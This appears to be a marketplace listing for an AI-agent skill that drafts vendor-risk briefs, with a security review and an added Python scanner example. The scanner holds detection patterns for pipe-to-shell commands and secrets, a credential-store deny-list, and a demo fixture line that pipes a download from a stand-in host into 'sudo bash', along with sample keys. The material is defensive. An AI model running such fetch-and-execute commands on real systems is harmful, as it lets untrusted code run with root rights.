Vendor Risk Brief

by vx:17605205782 (@52yuanchangxing) · GitHub · v1.0.0 · MIT-0
Platforms: darwin, linux, win32 · ✓ Security Clean
139 Downloads · 0 Stars · 0 Active Installs · 1 Version
Install in OpenClaw: /install vendor-risk-brief
Description
Produces a risk summary for an external SaaS/API, focusing on integration impact, permissions, data flows, and alternatives; use for vendor-risk, SaaS, and security workflows; do not use it to pass off its output as a security-certification conclusion, or as a substitute for formal legal/security approval.
Usage Guidance
This skill appears to do what it says: offline, template-driven vendor-risk briefs and local audits using a bundled Python script. Before running: (1) review scripts/run.py yourself (it uses only the standard library and reads local files); (2) do not point the tool at system/root directories or credential stores, since it scans whatever paths you give it and anything it reads can end up in the generated brief; and (3) avoid feeding it raw sensitive PII or secrets, and sanitize inputs first. If you need network-backed fact-checking or automated changes to external systems, handle those steps outside this skill and with proper approvals.
Capability Analysis
Type: OpenClaw Skill
Name: vendor-risk-brief
Version: 1.0.0
The 'vendor-risk-brief' skill appears to be what it claims: a tool that generates security risk summaries for SaaS/API vendors. The core logic in 'scripts/run.py' is transparent, using only Python standard libraries to process local text, CSV, or directory inputs into structured Markdown reports. Notably, the script includes a 'pattern_report' function that acts as a basic pattern scanner for risky commands (e.g., curl|bash) and hard-coded secrets, which is consistent with its stated purpose of risk assessment. No malicious behaviour such as data exfiltration or unauthorized execution was found in the reviewed version.
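As an added illustration, not the skill's own scripts/run.py (whose patterns are not shown on this page), the following Python sketches the kind of local pattern scan the Capability Analysis describes, and builds in the two guards the Usage Guidance above asks operators to apply by hand: refusing to scan system roots and credential stores, and masking matched secret values so the generated report does not itself leak them. The pattern set, the deny-list and the sample files are assumptions made for the example; the sample content is constructed.

```python
"""Illustrative local pattern scanner for a vendor-integration audit.

Added example; this is NOT the vendor-risk-brief skill's scripts/run.py.
Pattern names, deny-list entries and the sample files are assumptions.
POSIX paths are assumed.
"""
import os
import re
import tempfile
from pathlib import Path

# Hypothetical pattern set (the real skill's patterns are not shown on the page).
PATTERNS = {
    "pipe-to-shell": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"),
    "aws-access-key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic-secret": re.compile(
        r"(?i)\b(?:api[_-]?key|secret|token|password)\b\s*[:=]\s*['\"]?([^\s'\"]{8,})"
    ),
    "private-key-block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}
SECRET_PATTERNS = {"aws-access-key", "generic-secret"}  # evidence must be masked

# Assumed deny-list: system roots and well-known credential stores.
SYSTEM_ROOTS = (Path("/etc"), Path("/root"), Path("/proc"), Path("/sys"))
DENIED_NAMES = {".ssh", ".aws", ".gnupg", ".kube", "credentials", ".env"}


def is_denied_path(path: Path) -> bool:
    """True for '/', a system root, or any path containing a credential-store name.
    Both the lexical absolute path and the symlink-resolved path are checked."""
    for p in {Path(os.path.abspath(path)), path.resolve()}:
        if p == Path("/") or any(p == r or r in p.parents for r in SYSTEM_ROOTS):
            return True
        if any(part in DENIED_NAMES for part in p.parts):
            return True
    return False


def mask(value: str) -> str:
    """Keep only enough of a secret to correlate findings, never the whole value."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan_text(text: str, source: str) -> list[dict]:
    """Run every pattern over each line; mask evidence for secret patterns."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            evidence = m.group(1) if m.groups() else m.group(0)
            if name in SECRET_PATTERNS:
                evidence = mask(evidence)
            findings.append({"source": source, "line": lineno, "pattern": name, "evidence": evidence})
    return findings


def scan_path(root: Path, max_bytes: int = 1_000_000) -> list[dict]:
    """Scan a file or directory tree, refusing denied locations up front and
    skipping credential stores nested inside the tree."""
    if is_denied_path(root):
        raise PermissionError(f"refusing to scan sensitive location: {root}")
    files = [root] if root.is_file() else sorted(p for p in root.rglob("*") if p.is_file())
    findings = []
    for f in files:
        if is_denied_path(f) or f.stat().st_size > max_bytes:
            continue
        try:
            text = f.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        rel = f.name if root.is_file() else str(f.relative_to(root))
        findings.extend(scan_text(text, rel))
    return findings


def to_markdown(findings: list[dict]) -> str:
    """Render findings as the 'Main risks' section of a brief."""
    if not findings:
        return "## Main risks\n\n_No risky patterns or secrets detected._\n"
    rows = ["## Main risks", "", "| Source | Line | Pattern | Evidence |", "|---|---|---|---|"]
    for f in findings:
        rows.append(f"| {f['source']} | {f['line']} | {f['pattern']} | `{f['evidence'].replace('|', chr(92) + '|')}` |")
    return "\n".join(rows) + "\n"


def demo() -> list[dict]:
    """Build a constructed sample tree (invented content) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "install.sh").write_text("#!/bin/sh\ncurl -fsSL https://example.invalid/setup.sh | sudo bash\n")
        (root / "config.ini").write_text("api_key = sk_live_0123456789abcdef\nregion = eu-west-1\n")
        (root / ".aws").mkdir()  # nested credential store: must be skipped, not reported
        (root / ".aws" / "credentials").write_text("aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n")
        return scan_path(root)


if __name__ == "__main__":
    print(to_markdown(demo()))
```

Two findings come back from the sample tree: the pipe-to-shell line from install.sh is reported verbatim, the api_key value from config.ini is reported masked, and the nested .aws/credentials file never reaches the report at all because the deny-list is applied per file as well as to the root you pass in.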
Capability Assessment
Purpose & Capability
Name/description match the included assets: a template, spec, examples, and a Python script that generates structured vendor-risk briefs and local audits. Requiring python3 is proportionate; no unrelated binaries, env vars, or cloud credentials are requested.
Instruction Scope
Runtime instructions confine work to user-provided inputs, local spec/template, and an included script. The bundled script can read files, scan directories, and parse CSVs; this is expected for audit functionality but means whoever runs it must avoid pointing it at sensitive system directories or credential stores. The SKILL.md explicitly advises read-only, review-first behavior.
Install Mechanism
No install spec—instruction-only skill with a bundled Python script. There are no downloads, package managers, or extract steps. Risk from installation is minimal.
Credentials
The skill requests no environment variables or credentials (primaryEnv none). Its functionality operates on local files and templates; no secret exfiltration or unrelated credential access is requested or present in the code.
Persistence & Privilege
always=false and user-invocable; the skill does not modify other skills or system-wide settings. It may write an output file if told to, which is expected behavior for a report generator.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install vendor-risk-brief
  3. After installation, invoke the skill by name or use /vendor-risk-brief
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Initial release of vendor-risk-brief skill:
- Generates risk summaries for external SaaS/API integrations, focusing on integration impact, permissions, data flows, and alternatives.
- Designed for use in vendor-risk, SaaS, and security workflows.
- Outputs include supplier summary, permissions & data flow, main risks, mitigations, alternatives, and recommendation.
- Clearly states information gaps and operational boundaries; not a substitute for formal legal/security approval.
- Supports review drafts and executable checklists; provides structure for localized templates and specs.
- Emphasizes auditability and risk boundaries.
Metadata
Slug vendor-risk-brief
Version 1.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Vendor Risk Brief?

Produces a risk summary for an external SaaS/API, focusing on integration impact, permissions, data flows, and alternatives; use for vendor-risk, SaaS, and security workflows; do not use it to pass off its output as a security-certification conclusion, or as a substitute for formal legal/security approval. It is an AI Agent Skill for Claude Code / OpenClaw, with 139 downloads so far.

How do I install Vendor Risk Brief?

Run "/install vendor-risk-brief" in the OpenClaw or Claude Code chat to install it in one step. The only prerequisite is a local python3 interpreter, which the bundled script requires.

Is Vendor Risk Brief free?

Yes, Vendor Risk Brief is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Vendor Risk Brief support?

Vendor Risk Brief is cross-platform and runs anywhere OpenClaw / Claude Code is available (darwin, linux, win32).

Who created Vendor Risk Brief?

It is built and maintained by vx:17605205782 (@52yuanchangxing); the current version is v1.0.0.
